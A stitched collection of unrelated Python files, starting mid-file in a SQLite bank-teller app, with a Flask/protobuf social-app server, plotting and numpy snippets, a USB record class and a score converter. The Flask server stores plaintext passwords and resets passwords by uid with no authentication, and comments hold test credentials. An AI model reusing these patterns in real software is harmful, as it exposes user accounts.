print("That account number was invalid.")
return
cursor.execute("SELECT * FROM Bank_Account WHERE userId = ?", (info[0][0],))
print("Remaining Balance: $" + str(cursor.fetchall()[0][1]))
print()
def withdraw_funds(self):
print()
amount = input("How much would you like to withdrawl: ")
accnum = input("Which account are you pulling from: ")
cursor.execute("SELECT * FROM users WHERE AccountNumber = ?", accnum)
userInfo = cursor.fetchall()
try:
userInfo = userInfo[0]
except IndexError:
print("Could not find a user with that account number.")
return
cursor.execute("SELECT * FROM Bank_Account WHERE userId = ?", (userInfo[0],))
balance = cursor.fetchall()[0][1]
if balance >= int(amount):
# good to go
balance -= int(amount)
a = input("Did you give the customer their cash? Enter Y to continue")
if a == "y":
cursor.execute("UPDATE Bank_Account SET Balance = ? WHERE userId = ?", (balance, userInfo[0]))
else:
print("")
return
else:
print("The balance was less than the amount asked.")
return
print()
def view_profile(self):
print()
name = input("What is the customer's name: ")
ssn = input("What is the customers ssn: ")
cursor.execute("SELECT * FROM User_Profile WHERE name = ? AND ssn = ?", (name, ssn))
try:
stuff = cursor.fetchall()[0]
except IndexError:
print("Could not find a user with those credientals.")
return
print("""
UserId: {}
Name: {}
SSN: {}
Address: {}
Phone Number: {}
Income: {}
Email: {}
""".format(stuff[0], stuff[1], stuff[2], stuff[3], stuff[4], stuff[5], stuff[6]))
print()
def query_stock(self):
print()
name = input("What is the customer's name: ")
cursor.execute("SELECT * FROM User_Profile WHERE name = ?", (name,))
try:
userId = cursor.fetchall()[0][0]
except IndexError:
print("User not found.")
return
cursor.execute("SELECT * FROM Stock_Transactions WHERE userId = ?", (userId,))
rows = cursor.fetchall()
if not rows:
print("There are no transactions on this account.")
for stuff in rows:
print("""
Stock Name: {}
Type: {}
Amount: {}
Unit Price: {}
""".format(stuff[1], stuff[2], stuff[3], stuff[4]))
print()
class Stock_Trading_System(threading.Thread):
def __init__(self):
pass
def buy_stock(self,mess,signature,pubkey):
return rsa.verify(mess.encode(), signature, pubkey)
def sell_stock(self,mess,signature,pubkey):
return rsa.verify(mess.encode(), signature, pubkey)
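# NOTE: rsa.verify() raises rsa.VerificationError when the signature does not
# match, rather than returning False, so the "Message Compromised." branches in
# Customer only run if that exception is handled by the caller (currently it is not).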
if __name__ == "__main__":
# user: tellerTest
# pass: password123 / ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f
# user: regUserTest
# pass: password123 / ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f
# this is a test to see the content of the database
# I will delete this later
connection = sqlite3.connect("Customer_Teller_loginInfo.db")
cursor = connection.cursor()
cursor.execute("SELECT * FROM users")
#print(cursor.fetchall())
#print(type(cursor.fetchall()))
while True:
print("----------------------------------")
print("What would you like to do?")
print("1. Login as Customer")
print("2. login as Bank Teller")
print("3. Quit")
print("----------------------------------")
choice = input("Enter a number choice here: ")
if (choice == "1"):
print("Customer Login")
user = Customer()
user.log_on()
elif (choice == "2"):
print("Bank Teller Login")
user = Bank_Teller()
user.log_on()
elif (choice == "3"):
print("Closing system...")
quit(0)
else:
print("Incorrect option...")
|
def meow():
print("Meow!")
print("I am imported") # 이 print 함수는 전역 범위
|
import numpy as np
import distance
class MultiD(object):
"""
Deprecated: not used any more.
Use a plain 2-D numpy array directly instead.
"""
def __init__(self):
self.nameList = {}
# self.valueList = []
def __getitem__(self, key):
if not self.nameList.__contains__(key):
print("MultiD don't have this key", key)
# return False
return self.nameList[key]
def __setitem__(self, key, value):
self.nameList[key] = value
pass
class MultiSeq(object):
"""
Records the input dimension and time (length),
and uses them to initialize the multi-dimensional time series seq.
The first axis of seq is the dimension, the second axis is time.
"""
def __init__(self, dimension, length):
self.dimension = dimension
self.length = length
self.seq = np.zeros((dimension, length))
if __name__ == "__main__":
a = MultiSeq(2, 3) # 2 dimensions, length 3
a.seq[0][:] = [1, 2, 3] # usage example
print(a.seq) # seq is indexed as [k, t]
print(a.seq[:, 0:2]) # slice a time range [:, t]
print(a.seq[0, :]) # take a single dimension [k, :]
# print(a.seq[0][1])
print(distance.ccmDistance(a.seq[:, 0:2], a.seq[:, 1:3]))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 5 10:43:31 2018
@author: thomas
"""
import numpy as np
import matplotlib.pyplot as plt
def main():
#Color Palette for plotting
#Colors are in the following order: Red/Pink, Orange, Green, Blue, Purple
R1=[255/255,255/255,153/255,153/255,204/255]
G1=[153/255,204/255,255/255,204/255,153/255]
B1=[204/255,153/255,153/255,255/255,255/255]
#Sample Data (Just using numpy for ease)
var1List = [0.2,0.4,0.6]
var2List = [0.5,1.0,1.5]
time = np.linspace(0.0,10.0,10)
velocity = np.zeros((3,3,10))
k = 1.0
for i in range(len(var1List)):
velocity[i,0,:] = np.linspace(0.0,10.0*k,10)
velocity[i,1,:] = np.linspace(0.0,15.0*k,10)
velocity[i,2,:] = np.linspace(0.0,17.0*k,10)
k += 0.2
print('='*40+'\n')
print('i = ',i)
print(velocity[i,:,:])
print('-'*40+'\n')
fig = plt.figure(num=0, figsize=(4,4),dpi=120)
ax = fig.add_subplot(111)
ax.set_title('V vs Time: Color Preview')
ax.set_xlabel('Time (s)')
ax.set_ylabel('Vel (m/s)')
j = 0 #initial color (Red/Pink)
for k in range(len(var1List)):
i = 1 #used to scale line color so there is a darkness gradient as var2 changes
for m in range(len(var2List)):
R = R1[j]*i
G = G1[j]*i
B = B1[j]*i
#Plot each (var1, var2) line
ax.plot(time,velocity[k,m,:],
label='$var1$='+str(var1List[k])+' $var2$='+str(var2List[m]),color=(R,G,B),linewidth=2)
ax.scatter(time,velocity[k,m,:],
label=None,color=(R,G,B),s=18)
i -= 0.66/(len(var2List)+1) #Increase Darkness (-0.66) value can be changed
j += 1 #Increase color index (change color based on var1)
lgd = ax.legend(loc=2, bbox_to_anchor=(1.05,1),borderaxespad=0,ncol=1,fontsize='x-small')
fig.savefig('ColorPreview.png',bbox_extra_artists=(lgd,),bbox_inches='tight')
plt.show()
return
#------------------__END MAIN__-----------------------------------
main()
|
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# SPDX-License-Identifier: BSD-3-Clause
""" Request components shared between USB2 and USB3. """
from amaranth import *
from amaranth.hdl.rec import DIR_FANOUT
class SetupPacket(Record):
""" Record capturing the content of a setup packet.
Components (O = output from setup parser; read-only input to others):
O: received -- Strobe; indicates that a new setup packet has been received,
and thus this data has been updated.
O: is_in_request -- High if the current request is an 'in' request.
O: type[2] -- Request type for the current request.
O: recipient[5] -- Recipient of the relevant request.
O: request[8] -- Request number.
O: value[16] -- Value argument for the setup request.
O: index[16] -- Index argument for the setup request.
O: length[16] -- Length of the relevant setup request.
"""
def __init__(self):
super().__init__([
# Byte 1
('recipient', 5, DIR_FANOUT),
('type', 2, DIR_FANOUT),
('is_in_request', 1, DIR_FANOUT),
# Byte 2
('request', 8, DIR_FANOUT),
# Byte 3/4
('value', 16, DIR_FANOUT),
# Byte 5/6
('index', 16, DIR_FANOUT),
# Byte 7/8
('length', 16, DIR_FANOUT),
# Control signaling.
('received', 1, DIR_FANOUT),
])
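# A minimal usage sketch (an assumption for illustration only, not part of the
# original module): a hypothetical consumer that latches the request number
# whenever a new setup packet is flagged as received. The class name and the
# use of the default `sync` domain are invented for this example.
class ExampleSetupConsumer(Elaboratable):
    def __init__(self):
        self.setup = SetupPacket()
        self.last_request = Signal(8)

    def elaborate(self, platform):
        m = Module()
        with m.If(self.setup.received):
            m.d.sync += self.last_request.eq(self.setup.request)
        return m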
|
n1 = int(input('Enter the first term of the arithmetic progression: '))
r = int(input('Enter the common difference of the progression: '))
n = n1
aux = 1
while(aux != 11):
n = n1 + r*(aux-1)
print(n, end=' -> ')
aux += 1
print('end')
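# An equivalent sketch using the closed form a_n = a1 + (n - 1) * r
# (illustrative only; the loop above already prints the first 10 terms):
# terms = [n1 + r * k for k in range(10)]
# print(' -> '.join(str(t) for t in terms) + ' -> end')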
|
import numpy as np
import logging
from pprint import pformat
from keras.models import Model
from keras.layers import *
from pelesent.models import NeuralNetwork
logger = logging.getLogger(__name__)
class CNN(NeuralNetwork):
def build(self, nb_filter=100, filter_length=3, stride=1, pool_length=3, cnn_activation='relu',
nb_hidden=200, rnn='LSTM', rnn_activation='sigmoid', dropout_rate=0.5, verbose=True):
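# NOTE: several of the keyword arguments above (nb_filter, filter_length,
# pool_length, cnn_activation, nb_hidden, rnn, rnn_activation, dropout_rate)
# are not referenced below; the layer definitions use hard-coded values instead.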
logger.info('Building...')
inputs = []
sequence = Input(name='input_source', shape=(self.input_length, ), dtype='int32')
embedded = Embedding(self.emb_vocab_size, self.emb_size, input_length=self.input_length, weights=[self.emb_weights])(sequence)
drop = Dropout(0.2)(embedded)
cnn1d = Convolution1D(nb_filter=200, filter_length=3, activation='relu', subsample_length=stride)(drop)
maxp = GlobalMaxPooling1D()(cnn1d)
dense = Dense(200, activation='relu')(maxp)
drop2 = Dropout(0.2)(dense)
output = Dense(output_dim=self.nb_classes, activation='softmax', name='output_source')(drop2)
self.classifier = Model(input=[sequence], output=output)
logger.info('Compiling...')
self._compile()
if verbose:
self._summary()
def _compile(self):
self.classifier.compile(optimizer='rmsprop', loss='categorical_crossentropy')
def _summary(self):
self.classifier.summary()
logger.debug('Model built: {}'.format(pformat(self.classifier.get_config())))
|
from flask import Flask
from flask import request
import proto.Register_pb2 as Register
import proto.Personal_pb2 as Personal
import proto.Friend_pb2 as Friend
import proto.Basic_pb2 as Basic
import proto.Message_pb2 as Message
from src.db import Mongo
mongo = Mongo()
app = Flask("AI ins")
# Registration / login routes and handlers
@app.route('/login', methods=['POST'])
def login():
req = Register.RegisterReq()
data = request.data
req.ParseFromString(data)
print(req)
rsp = Register.RegisterRsp()
res = mongo.find_by_name(req.username)
# No nickname means this is a login request
if req.nickname == '':
if res is None or req.password != res['password']:
rsp.resultCode = 2
else:
rsp.resultCode = 0
rsp.uid = res['uid']
else: # a nickname present means this is a registration request
if res is None:
rsp.resultCode = 0
rsp.uid = mongo.login_add(req.username, req.nickname, req.password)
else:
rsp.resultCode = 1
return rsp.SerializeToString()
# User settings routes and handlers
@app.route('/setting', methods=['POST'])
def setting():
req = Personal.SettingReq()
data = request.data
req.ParseFromString(data)
errCode = 0
msg = ""
if req.type == 0:
req = req.iconReq
errCode,msg = process_iconreq(req)
elif req.type == 1:
req = req.nicknameReq
errCode,msg = process_nicknamereq(req)
elif req.type == 2:
req = req.passwordReq
errCode,msg = process_password(req)
else:
errCode = 3
msg = "Unknown type"
rsp = Personal.SettingRsp()
rsp.resultCode = errCode
rsp.msg = msg
print(rsp)
return rsp.SerializeToString()
def process_iconreq(req):
print('process_iconreq')
uid = req.uid
data = req.icon
res = mongo.find_by_uid(uid)
if res is None:
return 4,'uid not found'
mongo.setting_reset(res, 'icon', data)
return 0,'ok'
def process_nicknamereq(req):
print('process_nicknamereq')
uid = req.uid
name = req.nickname
res = mongo.find_by_uid(uid)
if res is None:
return 4,'uid not found'
mongo.setting_reset(res, 'nickname', name)
return 0,'ok'
# password validation is left to the client side
def process_password(req):
print('process_password')
uid = req.uid
new = req.new
res = mongo.find_by_uid(uid)
if res is None:
return 4,'uid not found'
mongo.setting_reset(res, 'password', new)
return 0,'ok'
# Friend-request handling
@app.route('/friend', methods=['POST'])
def friend():
print('friend request')
req = Friend.FriendReq()
data = request.data
req.ParseFromString(data)
if req.type == 0:
req = req.searchUserReq
return process_search_user(req)
elif req.type == 1:
req = req.addFriendReq
print('process_friend_add')
mongo.friend_add(req.src, req.dst)
return ''
elif req.type == 2:
req = req.pullAddFriendReq
return process_pull_friend_req(req)
elif req.type == 3:
req = req.removeFriendReq
process_remove_friend_req(req)
return ''
else:
print('unknown error')
return ''
def process_search_user(req):
print('process_search_user')
name = req.username
res = mongo.find_by_name(name)
rsp = Friend.SearchUserRsp()
if res is None:
rsp.resultCode = 1
else:
rsp.resultCode = 0
rsp.nickname = res['nickname']
rsp.username = res['username']
rsp.uid = res['uid']
if 'icon' in res.keys():
rsp.icon = res['icon']
return rsp.SerializeToString()
def process_pull_friend_req(req):
print('process_pull_friend_req')
uid = req.uid
l1 = mongo.friend_find(uid, None, True, False)
l2 = mongo.friend_find(None, uid, None, False)
rsp = Friend.PullAddFriendRsp()
l = l1 + l2
for r in l:
_r = rsp.reqs.add()
_r.src = r['src']
_r.dst = r['dst']
_r.isAccept = r['accept']
print(l)
return rsp.SerializeToString()
def process_remove_friend_req(req):
print('process_remove_friend_req')
mongo.friend_find(req.src, req.dst, req.isAccept, True)
# Query user information
@app.route('/user', methods=['POST'])
def user():
req = Basic.UserDataReq()
data = request.data
req.ParseFromString(data)
rsp = Basic.UserDataRsp()
for u in req.uid:
res = mongo.find_by_uid(u)
if res is None:
continue
r = rsp.userData.add()
r.nickname = res['nickname']
r.username = res['username']
if 'icon' in res.keys():
r.icon = res['icon']
else:
r.icon = b''
r.uid = res['uid']
return rsp.SerializeToString()
# Recent post feed
@app.route('/post', methods=['POST'])
def search():
req = Message.PostReq()
data = request.data
req.ParseFromString(data)
if req.type == 0:
l = mongo.post_find(req.time)
res = Message.PostRsp()
for r in l:
post = res.posts.add()
post.uid = r['uid']
post.text = r['text']
post.image = r['image']
post.time = r['time']
post.desc = r['desc']
post.username = r['username']
post.nickname = r['nickname']
post.icon = r['icon']
return res.SerializeToString()
elif req.type == 1:
process_post_raw(req)
elif req.type == 2:
process_post_transfer(req)
elif req.type == 3:
process_post_translation(req)
else:
print('Unknown type')
return ''
def process_post_raw(req):
print('process row post')
user = mongo.find_by_uid(req.uid)
r = Message.Post()
r.uid = req.uid
r.time = req.time
r.text = req.text
r.image = req.img1
r.username = user['username']
r.nickname = user['nickname']
if 'icon' in user.keys():
r.icon = user['icon']
mongo.post_add(r)
print(r.text)
def process_post_transfer(req):
print('process transfer post')
def process_post_translation(req):
print('process translation post')
@app.route('/message', methods=['POST'])
def message():
print('message request')
req = Message.MessageReq()
data = request.data
req.ParseFromString(data)
res = mongo.message_find(req.uid, req.time)
rsp = Message.MessageRsp()
for data in res:
r = rsp.msgs.add()
r.src = data['src']
r.dst = data['dst']
r.time = data['time']
r.text = data['text']
r.image = data['image']
return rsp.SerializeToString()
@app.route('/hello')
def hello():
return 'Hello World!'
from geventwebsocket.handler import WebSocketHandler
from geventwebsocket.server import WSGIServer
from geventwebsocket.websocket import WebSocket
client_list = {}
@app.route('/')
def entry():
user = request.environ.get('wsgi.websocket')
if user:
print('WebSocket connected')
uid = 0
try:
uid = int(user.receive())
client_list[uid] = user
print('uid {} connect to server'.format(uid))
while True:
msg = Message.Message()
msg.ParseFromString(user.receive())
print(msg.text)
# user.send(msg.SerializeToString())
dst = client_list[msg.dst]
if dst is not None:
dst.send(msg.SerializeToString())
mongo.message_add(msg)
except BaseException:
print('Connection failed')
print('uid {} leave server'.format(uid))
client_list[uid] = None
return 'good bye'
if __name__ == '__main__':
http_server = WSGIServer(('192.168.101.65', 5000), application=app, handler_class=WebSocketHandler)
http_server.serve_forever()
'''
Data is stored in MongoDB.
Routes:
0. / main page, no functionality yet
1. /login login page, handles login and registration requests
2. /post nearby/recent posts, returned on request
3. /setting update user settings
4. /friend add friends
5. /user query user information
6. /message fetch message history
resultCode:
1: registration failed, username already taken
2: wrong password on login, or username does not exist
3: invalid setting request type
4: setting uid not found
5: friend type error
'''
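# A minimal client-side sketch (an illustrative assumption, not part of the
# original service): calling the /login route above with the same proto
# definitions, assuming the server is reachable at http://localhost:5000.
def example_login(username, password):
    import requests
    req = Register.RegisterReq()
    req.username = username
    req.password = password
    req.nickname = ''  # an empty nickname means "login" rather than "register"
    resp = requests.post('http://localhost:5000/login', data=req.SerializeToString())
    rsp = Register.RegisterRsp()
    rsp.ParseFromString(resp.content)
    return rsp.resultCode, rsp.uid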
|
# -*- coding: utf-8 -*-
class Solution:
DIRECTIONS = [(-1, 0), (0, 1), (1, 0), (0, -1)]
def surfaceArea(self, grid):
result = 0
for i in range(len(grid)):
for j in range(len(grid[0])):
result += self.singleSurfaceArea(grid, i, j)
return result
def singleSurfaceArea(self, grid, i, j):
result = 2 if grid[i][j] else 0
for neighbor in self.getNeighbors(grid, i, j):
if grid[i][j] > neighbor:
result += grid[i][j] - neighbor
return result
def getNeighbors(self, grid, i, j):
result = []
for h, k in self.DIRECTIONS:
result.append(self.getNeighbor(grid, i + h, j + k))
return result
def getNeighbor(self, grid, i, j):
if i < 0 or i >= len(grid) or j < 0 or j >= len(grid[0]):
return 0
return grid[i][j]
if __name__ == "__main__":
solution = Solution()
assert 10 == solution.surfaceArea([[2]])
assert 34 == solution.surfaceArea(
[
[1, 2],
[3, 4],
]
)
assert 16 == solution.surfaceArea(
[
[1, 0],
[0, 2],
]
)
assert 32 == solution.surfaceArea(
[
[1, 1, 1],
[1, 0, 1],
[1, 1, 1],
]
)
assert 46 == solution.surfaceArea(
[
[2, 2, 2],
[2, 1, 2],
[2, 2, 2],
]
)
|
try:
from cartotools.crs import * # noqa: F401 F403
from cartotools.osm import location
except ImportError:
# cartotools provides a few more basic projections
from cartopy.crs import * # noqa: F401 F403
# Basic version of the complete cached requests included in cartotools
from .location import location # noqa: F401
from cartopy.feature import NaturalEarthFeature
from cartopy.mpl.geoaxes import GeoAxesSubplot
from ..core.mixins import ShapelyMixin
def countries(**kwargs):
params = {'category': 'cultural',
'name': 'admin_0_countries',
'scale': '10m',
'edgecolor': '#524c50',
'facecolor': 'none',
'alpha': .5,
**kwargs}
return NaturalEarthFeature(**params)
def rivers(**kwargs):
params = {'category': 'physical',
'name': 'rivers_lake_centerlines',
'scale': '10m',
'edgecolor': '#226666',
'facecolor': 'none',
'alpha': .5,
**kwargs}
return NaturalEarthFeature(**params)
def lakes(**kwargs):
params = {'category': 'physical',
'name': 'lakes',
'scale': '10m',
'edgecolor': '#226666',
'facecolor': '#226666',
'alpha': .2,
**kwargs}
return NaturalEarthFeature(**params)
def ocean(**kwargs):
params = {'category': 'physical',
'name': 'ocean',
'scale': '10m',
'edgecolor': '#226666',
'facecolor': '#226666',
'alpha': .2,
**kwargs}
return NaturalEarthFeature(**params)
def _set_default_extent(self):
"""Helper for a default extent limited to the projection boundaries."""
west, south, east, north = self.projection.boundary.bounds
self.set_extent((west, east, south, north), crs=self.projection)
GeoAxesSubplot.set_default_extent = _set_default_extent
def _set_extent(self, shape):
if isinstance(shape, ShapelyMixin):
return self._set_extent(shape.extent)
self._set_extent(shape)
GeoAxesSubplot._set_extent = GeoAxesSubplot.set_extent
GeoAxesSubplot.set_extent = _set_extent
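# A minimal usage sketch (an illustrative assumption, not part of the original
# module): drawing the features defined above on a PlateCarree map.
def example_map():
    import matplotlib.pyplot as plt
    from cartopy.crs import PlateCarree
    fig, ax = plt.subplots(subplot_kw=dict(projection=PlateCarree()))
    ax.add_feature(countries())
    ax.add_feature(rivers())
    ax.add_feature(lakes())
    ax.set_default_extent()  # helper patched onto GeoAxesSubplot above
    plt.show()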
|
# Open test_lists.p, which stores a dictionary of dictionaries
import pickle
filename = "test_lists.p"
in_file = open(filename, "rb")
d_from_file = pickle.load(in_file)
in_file.close()
# Designate domains and score types again
domains = {
1: "Language",
2: "Spatial",
3: "Motor",
4: "Attention",
5: "Executive Function"
}
score_types = {
1: "Standard Score",
2: "Scaled Score",
3: "T-Score",
4: "Z-Score"
}
# Split d_from_file into individual dictionaries again
language = d_from_file[1]
spatial = d_from_file[2]
motor = d_from_file[3]
attention = d_from_file[4]
executive = d_from_file[5]
# Divide dictionaries into 2 lists: list of tests and list of scoretype number codes
language_t = list(language.keys())
language_s = list(language.values())
spatial_t = list(spatial.keys())
spatial_s = list(spatial.values())
motor_t = list(motor.keys())
motor_s = list(motor.values())
attention_t = list(attention.keys())
attention_s = list(attention.values())
executive_t = list(executive.keys())
executive_s = list(executive.values())
# Enter the scores and store it in a list with the score type code.
# Has to be a list, not a dictionary, because the same pairing may occur multiple times
print("Language")
x = 0
language_scores = []
while x < len(language_s):
print(language_t[x])
t = language_s[x]
print(score_types[t])
print()
s = input("Enter Patient's Score: ")
s = float(s)
language_scores.append(s)
x = x + 1
print(language_scores)
print()
print("Spatial")
x = 0
spatial_scores = []
while x < len(spatial_s):
print(spatial_t[x])
t = spatial_s[x]
print(score_types[t])
print()
s = input("Enter Patient's Score: ")
s = float(s)
spatial_scores.append(s)
x = x + 1
print(spatial_scores)
print()
print("Motor")
x = 0
motor_scores = []
while x < len(motor_s):
print(motor_t[x])
t = motor_s[x]
print(score_types[t])
print()
s = input("Enter Patient's Score: ")
s = float(s)
motor_scores.append(s)
x = x + 1
print(motor_scores)
print()
print("Attention")
x = 0
attention_scores = []
while x < len(attention_s):
print(attention_t[x])
t = attention_s[x]
print(score_types[t])
print()
s = input("Enter Patient's Score: ")
s = float(s)
attention_scores.append(s)
x = x + 1
print(attention_scores)
print()
print("Executive")
x = 0
executive_scores = []
while x < len(executive_s):
print(executive_t[x])
t = executive_s[x]
print(score_types[t])
print()
s = input("Enter Patient's Score: ")
s = float(s)
executive_scores.append(s)
x = x + 1
print(executive_scores)
print()
# Convert all entered scores into a Scaled Score
# For loop based on the list of entered scores for the domain
# Which calculation is performed depends on the list of score type number codes for the domain
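# A hedged helper sketch capturing the same conversion rules used in the blocks
# below (illustrative only; the per-domain loops are left as they are):
# 1 = Standard Score (mean 100, SD 15), 2 = Scaled Score, 3 = T-Score (mean 50,
# SD 10), 4 = Z-Score; all are mapped onto the scaled-score metric (mean 10, SD 3).
def to_scaled(score, score_type):
    if score_type == 1:
        return ((score - 100) / 15) * 3 + 10
    if score_type == 2:
        return score
    if score_type == 3:
        return ((score - 50) / 10) * 3 + 10
    if score_type == 4:
        return score * 3 + 10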
print("Language Conversions to Scaled Score")
language_c = []
count = 0
for y in language_scores:
y = float(y)
if language_s[count] == 1:
step = (y-100)/15
c = (step*3) + 10
elif language_s[count] == 2:
c = y
elif language_s[count] == 3:
step = (y-50)/10
c = (step*3) + 10
elif language_s[count] == 4:
c = (y*3) + 10
language_c.append(c)
count = count + 1
print(language_c)
print()
print("Spatial Conversions to Scaled Score")
spatial_c = []
count = 0
for y in spatial_scores:
y = float(y)
if spatial_s[count] == 1:
step = (y-100)/15
c = (step*3) + 10
elif spatial_s[count] == 2:
c = y
elif spatial_s[count] == 3:
step = (y-50)/10
c = (step*3) + 10
elif spatial_s[count] == 4:
c = (y*3) + 10
spatial_c.append(c)
count = count + 1
print(spatial_c)
print()
print("Motor Conversions to Scaled Score")
motor_c = []
count = 0
for y in motor_scores:
y = float(y)
if motor_s[count] == 1:
step = (y-100)/15
c = (step*3) + 10
elif motor_s[count] == 2:
c = y
elif motor_s[count] == 3:
step = (y-50)/10
c = (step*3) + 10
elif motor_s[count] == 4:
c = (y*3) + 10
motor_c.append(c)
count = count + 1
print(motor_c)
print()
print("Attention Conversions to Scaled Score")
attention_c = []
count = 0
for y in attention_scores:
y = float(y)
if attention_s[count] == 1:
step = (y-100)/15
c = (step*3) + 10
elif attention_s[count] == 2:
c = y
elif attention_s[count] == 3:
step = (y-50)/10
c = (step*3) + 10
elif attention_s[count] == 4:
c = (y*3) + 10
attention_c.append(c)
count = count + 1
print(attention_c)
print()
print("Executive Function Conversions to Scaled Score")
executive_c = []
count = 0
for y in executive_scores:
y = float(y)
if executive_s[count] == 1:
step = (y-100)/15
c = (step*3) + 10
elif executive_s[count] == 2:
c = y
elif executive_s[count] == 3:
step = (y-50)/10
c = (step*3) + 10
elif executive_s[count] == 4:
c = (y*3) + 10
executive_c.append(c)
count = count + 1
print(executive_c)
print()
# Create an excel workbook of the results
import xlsxwriter
workbook = xlsxwriter.Workbook("ScoreConversions.xlsx")
worksheet1 = workbook.add_worksheet("Language")
worksheet2 = workbook.add_worksheet("Spatial")
worksheet3 = workbook.add_worksheet("Motor")
worksheet4 = workbook.add_worksheet("Attention")
worksheet5 = workbook.add_worksheet("Executive Function")
#Create Domain labels with room to fill in data
worksheet1.write(0, 0, "Domain:")
worksheet1.write(0, 1, "Language")
#Create Labels
worksheet1.write(1, 0, "Tests Administered:")
worksheet1.write(1, 1, "Score Type:")
worksheet1.write(1, 2, "Patient Score:")
worksheet1.write(1, 3, "Converted Scaled Score:")
# Start in next row
row = 2
column = 0
#Fill in data
for a in language_t:
worksheet1.write(row, column, a)
row = row + 1
row = 2
column = 1
for b in language_s:
worksheet1.write(row, column, score_types[b])
row = row + 1
row = 2
column = 2
for c in language_scores:
worksheet1.write(row, column, c)
row = row + 1
row = 2
column = 3
for d in language_c:
worksheet1.write(row, column, d)
row = row + 1
#Create Domain labels with room to fill in data
worksheet1.write(0, 0, "Domain:")
worksheet1.write(0, 1, "Spatial")
#Create Labels
worksheet1.write(1, 0, "Tests Administered:")
worksheet1.write(1, 1, "Score Type:")
worksheet1.write(1, 2, "Patient Score:")
worksheet1.write(1, 3, "Converted Scaled Score:")
# Start in next row
row = 2
column = 0
#Fill in data
for a in spatial_t:
worksheet1.write(row, column, a)
row = row + 1
row = 2
column = 1
for b in spatial_s:
worksheet1.write(row, column, score_types[b])
row = row + 1
row = 2
column = 2
for c in spatial_scores:
worksheet1.write(row, column, c)
row = row + 1
row = 2
column = 3
for d in spatial_c:
worksheet1.write(row, column, d)
row = row + 1
#Create Domain labels with room to fill in or calculate data
worksheet1.write(0, 0, "Domain:")
worksheet1.write(0, 1, "Motor")
#Create Labels
worksheet1.write(1, 0, "Tests Administered:")
worksheet1.write(1, 1, "Score Type:")
worksheet1.write(1, 2, "Patient Score:")
worksheet1.write(1, 3, "Converted Scaled Score:")
# Start in next row
row = 2
column = 0
#Fill in data
for a in motor_t:
worksheet1.write(row, column, a)
row = row + 1
row = 2
column = 1
for b in motor_s:
worksheet1.write(row, column, score_types[b])
row = row + 1
row = 2
column = 2
for c in motor_scores:
worksheet1.write(row, column, c)
row = row + 1
row = 2
column = 3
for d in motor_c:
worksheet1.write(row, column, d)
row = row + 1
#Create Domain labels with room to fill in or calculate data
worksheet1.write(0, 0, "Domain:")
worksheet1.write(0, 1, "Attention")
#Create Labels
worksheet1.write(1, 0, "Tests Administered:")
worksheet1.write(1, 1, "Score Type:")
worksheet1.write(1, 2, "Patient Score:")
worksheet1.write(1, 3, "Converted Scaled Score:")
# Start in next row
row = 2
column = 0
#Fill in data
for a in attention_t:
worksheet1.write(row, column, a)
row = row + 1
row = 2
column = 1
for b in attention_s:
worksheet1.write(row, column, score_types[b])
row = row + 1
row = 2
column = 2
for c in attention_scores:
worksheet1.write(row, column, c)
row = row + 1
row = 2
column = 3
for d in attention_c:
worksheet1.write(row, column, d)
row = row + 1
#Create Domain labels with room to fill in or calculate data
worksheet1.write(0, 0, "Domain:")
worksheet1.write(0, 1, "Executive Function")
#Create Labels
worksheet1.write(1, 0, "Tests Administered:")
worksheet1.write(1, 1, "Score Type:")
worksheet1.write(1, 2, "Patient Score:")
worksheet1.write(1, 3, "Converted Scaled Score:")
# Start in next row
row = 2
column = 0
#Fill in data
for a in executive_t:
worksheet1.write(row, column, a)
row = row + 1
row = 2
column = 1
for b in executive_s:
worksheet1.write(row, column, score_types[b])
row = row + 1
row = 2
column = 2
for c in executive_scores:
worksheet1.write(row, column, c)
row = row + 1
row = 2
column = 3
for d in executive_c:
worksheet1.write(row, column, d)
row = row + 1
workbook.close()
|
#!/usr/bin/env python
import os
import sys
import shutil
import datetime
import pyperclip
import subprocess
clipboard_copy = pyperclip.clipboards.init_osx_clipboard()[0]
STATIC_DIR = os.path.join(os.path.dirname(__file__), "static")
if len(sys.argv) == 1:
print "Usage: %s file.jpg [file.jpg ...]" % sys.argv[0]
sys.exit(1)
copy_str = ""
for fname in sys.argv[1:]:
bname = os.path.basename(fname)
if not os.path.exists(fname):
sys.stderr.write("File not found: %s\n" % fname)
sys.exit(1)
if not os.path.exists(STATIC_DIR):
sys.stderr.write("Couldn't find static dir %s\n" % STATIC_DIR)
sys.exit(1)
today = datetime.date.today()
upload_path = os.path.join("uploads",
str(today.year),
str(today.month),
str(today.day))
full_upload_path = os.path.join(STATIC_DIR, upload_path)
if not os.path.exists(full_upload_path):
os.makedirs(full_upload_path)
bname = bname.replace(' ', '_')
target = os.path.join(full_upload_path, bname)
if not os.path.exists(target):
shutil.copy(fname, target)
ext = target.split('.')[-1]
target_sm = target[:-(len(ext) + 1)] + "-640x480." + ext
bname_sm = os.path.basename(target_sm)
if ext in ['jpg', 'jpeg', 'png']:
print target, target_sm
subprocess.check_call(["convert", "-resize", "640x480>", target, target_sm])
copy_str += "<div class='image'><a href='/%s/%s'><img src='/%s/%s' class='uploaded-img' /></a></div>\n" % \
(upload_path, bname, upload_path, bname_sm)
print "Copied %s to %s" % (fname, target)
clipboard_copy(copy_str)
print "Done and copied to clipboard."
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import time
from wgraph.graph import (
load,
search,
Word,
verbose,
Graph,
draw_graph,
add_node,
create_graph,
apply_styles,
)
def distance(graph: Graph, word1: Word, word2: Word) -> int:
graph_path = search(
graph=graph,
start_word=word1,
stop_condition=lambda ref: ref.word == word2,
max_depth=3,
)
if not graph_path:
return -1
return len(graph_path)
def main() -> None:
path = sys.argv[1]
word1 = Word(sys.argv[2])
word2 = Word(sys.argv[3])
t0 = time.time()
graph = load(path)
t1 = time.time()
graph_path = search(
graph=graph,
start_word=word1,
stop_condition=lambda ref: ref.word == word2,
max_depth=3,
)
t2 = time.time()
print("Search time", t2 - t1)
print("Total time", t2 - t0)
g = create_graph(word1)
if graph_path:
print("Distance:", len(graph_path))
print("Start:", word1)
parent = None
for ref in graph_path:
print(">", verbose(ref))
add_node(g, parent, ref, word1)
parent = ref
filename = f"wgraph_distance_{word1}_{word2}"
apply_styles(word1, g).render(filename)
print("Graph written into:", filename)
